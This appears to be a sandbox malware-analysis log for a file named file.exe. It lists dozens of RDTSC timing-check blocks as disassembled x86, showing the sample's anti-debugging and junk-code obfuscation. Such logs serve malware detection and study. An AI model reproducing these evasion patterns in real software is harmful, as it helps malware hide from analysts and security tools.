                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50333F second address: 503388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F731h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 480D5CA0h 0x00000012 mov ecx, 6F5E6001h 0x00000017 lea ebx, dword ptr [ebp+124550FBh] 0x0000001d mov edi, 6CEEF6FAh 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FB438C6F737h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50347D second address: 5034B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FB438CB0BFFh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnp 00007FB438CB0C03h 0x00000017 jmp 00007FB438CB0BFDh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5034B4 second address: 5034B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5034B9 second address: 5034CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438CB0C01h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5034CE second address: 5034D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5034D2 second address: 503544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edi, 0269625Ah 0x0000000e push 00000003h 0x00000010 push 00000000h 0x00000012 or dword ptr [ebp+122D2860h], edi 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FB438CB0BF8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push edi 0x00000035 or ecx, dword ptr [ebp+122D1F6Ch] 0x0000003b pop edx 0x0000003c jnl 00007FB438CB0BFCh 0x00000042 call 00007FB438CB0BF9h 0x00000047 jmp 00007FB438CB0C01h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jnl 00007FB438CB0BF8h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503544 second address: 503565 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB438C6F733h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503565 second address: 5035A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FB438CB0C00h 0x00000012 jmp 00007FB438CB0BFFh 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035A2 second address: 503609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB438C6F726h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007FB438C6F735h 0x00000016 jmp 00007FB438C6F72Bh 0x0000001b popad 0x0000001c pop eax 0x0000001d add ecx, dword ptr [ebp+122D28BDh] 0x00000023 lea ebx, dword ptr [ebp+12455104h] 0x00000029 mov edi, dword ptr [ebp+122D17EDh] 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 push ebx 0x00000032 pushad 0x00000033 popad 0x00000034 pop ebx 0x00000035 push ebx 0x00000036 pushad 0x00000037 popad 0x00000038 pop ebx 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c jmp 00007FB438C6F730h 0x00000041 pushad 0x00000042 push ecx 0x00000043 pop ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5036E8 second address: 50371F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FB438CB0C09h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007FB438CB0BFFh 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50371F second address: 5037EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F733h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FB438C6F738h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 js 00007FB438C6F738h 0x0000001b jmp 00007FB438C6F732h 0x00000020 jno 00007FB438C6F728h 0x00000026 popad 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FB438C6F728h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 jmp 00007FB438C6F732h 0x00000047 push 00000003h 0x00000049 push 00000000h 0x0000004b pushad 0x0000004c mov esi, dword ptr [ebp+122D290Dh] 0x00000052 mov si, ax 0x00000055 popad 0x00000056 push 00000003h 0x00000058 adc ecx, 041CC1FAh 0x0000005e call 00007FB438C6F729h 0x00000063 jnc 00007FB438C6F734h 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FB438C6F72Ah 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037EF second address: 5037F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037F9 second address: 5037FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5037FD second address: 50384A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jnp 00007FB438CB0C0Eh 0x00000012 jns 00007FB438CB0BFCh 0x00000018 jp 00007FB438CB0BF6h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FB438CB0C00h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50384A second address: 50389F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jl 00007FB438C6F73Bh 0x00000010 pop eax 0x00000011 xor edi, dword ptr [ebp+122D2A21h] 0x00000017 lea ebx, dword ptr [ebp+1245510Fh] 0x0000001d xor ch, FFFFFFA6h 0x00000020 push eax 0x00000021 pushad 0x00000022 jno 00007FB438C6F72Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB438C6F730h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5169FC second address: 516A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007FB438CB0BF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516A11 second address: 516A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F734h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524065 second address: 52406B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52406B second address: 52406F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52406F second address: 524098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C05h 0x00000007 jo 00007FB438CB0BF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521EE5 second address: 521F20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FB438C6F72Ah 0x0000000a pop edi 0x0000000b jmp 00007FB438C6F734h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB438C6F732h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522065 second address: 522093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438CB0C09h 0x00000009 ja 00007FB438CB0BF6h 0x0000000f popad 0x00000010 jmp 00007FB438CB0BFAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5224EB second address: 522513 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB438C6F726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FB438C6F72Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522E7A second address: 522EA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB438CB0C04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB438CB0C05h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0824 second address: 4F082A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F082A second address: 4F0830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0830 second address: 4F0835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52319F second address: 5231F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C02h 0x00000007 jmp 00007FB438CB0C04h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007FB438CB0BF6h 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a popad 0x0000001b ja 00007FB438CB0C24h 0x00000021 pushad 0x00000022 jmp 00007FB438CB0BFEh 0x00000027 push esi 0x00000028 pop esi 0x00000029 jns 00007FB438CB0BF6h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5231F8 second address: 5231FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5231FE second address: 523202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237A7 second address: 5237AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237AD second address: 5237B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237B1 second address: 5237E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB438C6F726h 0x00000008 jmp 00007FB438C6F730h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB438C6F736h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5237E3 second address: 5237E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523915 second address: 523919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523919 second address: 52392A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB438CB0BFBh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52392A second address: 523959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FB438C6F726h 0x0000000f jmp 00007FB438C6F737h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523EAF second address: 523EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FB438CB0C02h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523EC8 second address: 523F07 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB438C6F737h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB438C6F731h 0x00000012 jmp 00007FB438C6F72Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523F07 second address: 523F0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529649 second address: 52964E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52964E second address: 529694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB438CB0BF6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f js 00007FB438CB0C08h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007FB438CB0BFFh 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 jne 00007FB438CB0BF6h 0x00000029 pop esi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529694 second address: 52969A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5302B5 second address: 5302BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53085F second address: 530887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB438C6F737h 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FB438C6F726h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5339C4 second address: 5339CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5339CA second address: 5339F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F737h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340C7 second address: 5340DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340DD second address: 5340F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C6F72Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F0 second address: 534110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534574 second address: 53457A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534B37 second address: 534BA0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB438CB0BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007FB438CB0C0Dh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FB438CB0BF8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f jmp 00007FB438CB0C03h 0x00000034 push eax 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 js 00007FB438CB0BF6h 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534BA0 second address: 534BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53519A second address: 5351C1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB438CB0BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007FB438CB0C01h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5351C1 second address: 5351C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537BA1 second address: 537BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53819A second address: 5381A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB438C6F726h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538D24 second address: 538D77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sbb si, CA0Eh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FB438CB0BF8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D1989h], eax 0x00000032 push 00000000h 0x00000034 sub di, D0C7h 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b pushad 0x0000003c js 00007FB438CB0BF6h 0x00000042 jns 00007FB438CB0BF6h 0x00000048 popad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AD0 second address: 538AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539807 second address: 53980B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A393 second address: 53A398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B61C second address: 53B634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438CB0C04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C06C second address: 53C076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB438C6F726h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2BC second address: 53F2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2C0 second address: 53F2C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2C5 second address: 53F2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB438CB0C04h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F2E4 second address: 53F33E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edi 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FB438C6F728h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 clc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FB438C6F728h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov edi, 08ABF730h 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F33E second address: 53F344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5404EF second address: 5404F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F545 second address: 53F549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5415D4 second address: 5415E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C6F72Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442AB second address: 5442BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442BA second address: 5442C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442C0 second address: 5442C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5442C4 second address: 544332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jnl 00007FB438C6F738h 0x00000010 pop edi 0x00000011 nop 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D1929h], ebx 0x00000019 mov ebx, dword ptr [ebp+122D1A7Ch] 0x0000001f popad 0x00000020 push 00000000h 0x00000022 jmp 00007FB438C6F72Ah 0x00000027 push 00000000h 0x00000029 call 00007FB438C6F735h 0x0000002e mov dword ptr [ebp+1245D1C4h], esi 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 jmp 00007FB438C6F72Dh 0x0000003e pop eax 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5452B0 second address: 5452B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5452B6 second address: 5452BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
